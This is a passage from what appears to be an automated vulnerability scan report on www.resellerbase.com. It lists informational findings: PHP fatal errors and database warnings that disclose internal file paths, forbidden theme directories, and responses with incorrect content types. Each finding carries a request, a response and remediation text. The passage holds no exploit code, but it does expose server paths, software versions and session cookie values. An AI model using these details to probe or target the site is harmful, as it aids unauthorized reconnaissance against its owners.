Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.29. http://www.resellerbase.com/tag/ssl+certificates

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/ssl+certificates

Request

GET /tag/ssl+certificates HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/dograecorp.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.30. http://www.resellerbase.com/tag/survey

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/survey

Request

GET /tag/survey HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/netapplications-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.31. http://www.resellerbase.com/tag/uptime+monitoring

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/uptime+monitoring

Request

GET /tag/uptime+monitoring HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/proxyonline-info-website-monitoring.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.32. http://www.resellerbase.com/tag/web+cam+chat

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/web+cam+chat

Request

GET /tag/web+cam+chat HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/rivcash-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.33. http://www.resellerbase.com/tag/web+statistics

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/web+statistics

Request

GET /tag/web+statistics HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/netapplications-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.34. http://www.resellerbase.com/tag/webhosting

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/webhosting

Request

GET /tag/webhosting HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/dograecorp.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.35. http://www.resellerbase.com/tag/website+monitoring

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/website+monitoring

Request

GET /tag/website+monitoring HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/proxyonline-info-website-monitoring.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.36. http://www.resellerbase.com/themes/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/

Request

GET /themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 403 Forbidden
Date: Wed, 17 Nov 2010 22:54:49 GMT
Server: Apache/2
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 483

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>403 Forbidden</TITLE>
</HEAD><BODY>
<H1>Forbidden</H1>
You don't have permission to access /themes/ on this server.
<HR>
<I>www.r
...[SNIP]...

10.37. http://www.resellerbase.com/themes/kosmos/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/

Request

GET /themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 403 Forbidden
Date: Wed, 17 Nov 2010 22:54:49 GMT
Server: Apache/2
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 490

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>403 Forbidden</TITLE>
</HEAD><BODY>
<H1>Forbidden</H1>
You don't have permission to access /themes/kosmos/ on this server.
<HR>
<
...[SNIP]...

10.38. http://www.resellerbase.com/themes/kosmos/images/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/images/

Request

GET /themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 403 Forbidden
Date: Wed, 17 Nov 2010 22:54:49 GMT
Server: Apache/2
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 497

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>403 Forbidden</TITLE>
</HEAD><BODY>
<H1>Forbidden</H1>
You don't have permission to access /themes/kosmos/images/ on this server.
...[SNIP]...

10.39. http://www.resellerbase.com/themes/kosmos/images/pr/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/images/pr/

Request

GET /themes/kosmos/images/pr/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 403 Forbidden
Date: Wed, 17 Nov 2010 22:54:49 GMT
Server: Apache/2
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 500

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>403 Forbidden</TITLE>
</HEAD><BODY>
<H1>Forbidden</H1>
You don't have permission to access /themes/kosmos/images/pr/ on this serv
...[SNIP]...

10.40. http://www.resellerbase.com/themes/kosmos/images/rating/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/images/rating/

Request

GET /themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 403 Forbidden
Date: Wed, 17 Nov 2010 22:54:49 GMT
Server: Apache/2
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 504

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>403 Forbidden</TITLE>
</HEAD><BODY>
<H1>Forbidden</H1>
You don't have permission to access /themes/kosmos/images/rating/ on this
...[SNIP]...

10.41. http://www.resellerbase.com/themes/kosmos/images/review/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/images/review/

Request

GET /themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 403 Forbidden
Date: Wed, 17 Nov 2010 22:54:49 GMT
Server: Apache/2
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 504

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>403 Forbidden</TITLE>
</HEAD><BODY>
<H1>Forbidden</H1>
You don't have permission to access /themes/kosmos/images/review/ on this
...[SNIP]...

10.42. http://www.resellerbase.com/themes/kosmos/images/template_24.gif/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/images/template_24.gif/

Request

GET /themes/kosmos/images/template_24.gif/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/blocks/block.whos_online.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 404 Not Found
Date: Wed, 17 Nov 2010 22:54:49 GMT
Server: Apache/2
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Length: 477
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>The top 100 Reseller resources</title>
<meta http-equiv="REFRESH" content="0;url=http://www.resellerbase.com"></HEAD
...[SNIP]...

10.43. http://www.resellerbase.com/user_detail.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Request

GET /user_detail.php?u=flerarcegrent HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:03:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 636
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.p
...[SNIP]...

10.44. http://www.resellerbase.com/web-service/more2.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/more2.html

Request

GET /web-service/more2.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:49:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

11. Content type incorrectly stated
There are 34 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly, analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results and, if the content contains any user-controllable data, may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


11.1. http://www.resellerbase.com/adult/media-chat/more2.html

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/more2.html

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /adult/media-chat/more2.html?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/more2.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:30:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

11.2. http://www.resellerbase.com/adult/more2.html

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/more2.html

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /adult/more2.html?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/more2.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:33:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to undefined method stdClass::RecordCount() in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/link.class.php</b> on line <b>0</b><br />

11.3. http://www.resellerbase.com/goods-wholesale/search.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/search.php

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /goods-wholesale/search.php?cat=4&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:41:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

11.4. http://www.resellerbase.com/googlepr.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /googlepr.php

Issue detail

The response contains the following Content-type statement: Content-Type: image/gif. The response states that it contains a GIF image. However, it actually appears to contain plain text.

Request

GET /googlepr.php?link_id=29 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 1151
Connection: close
Content-Type: image/gif

<br />
<b>Warning</b>: readfile(themes/kosmos/images/pr///www.google.com/terms_of_service.html). In your email, please send us the &lt;b&gt;entire&lt;/b&gt; code displayed below. Please also send us
...[SNIP]...

11.5. http://www.resellerbase.com/other/search.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /other/search.php

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /other/search.php?cat=6&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/other/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:51:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

11.6. http://www.resellerbase.com/resources-information/ebooks/search.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/search.php

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /resources-information/ebooks/search.php?cat=9&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:50:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

11.7. http://www.resellerbase.com/resources-information/search.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /resources-information/search.php

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /resources-information/search.php?cat=10&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:51:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

11.8. http://www.resellerbase.com/tag/Outsource+SEO

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /tag/Outsource+SEO

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /tag/Outsource+SEO HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/hubshout-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

11.9. http://www.resellerbase.com/tag/Reseller+SEO

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /tag/Reseller+SEO

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /tag/Reseller+SEO HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

11.10. http://www.resellerbase.com/tag/Resellers+SEO

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /tag/Resellers+SEO

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /tag/Resellers+SEO HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

11.11. http://www.resellerbase.com/tag/SEO+Reseller

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /tag/SEO+Reseller

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /tag/SEO+Reseller HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/hubshout-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

11.12. http://www.resellerbase.com/tag/SEO+Resellers

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /tag/SEO+Resellers

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /tag/SEO+Resellers HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
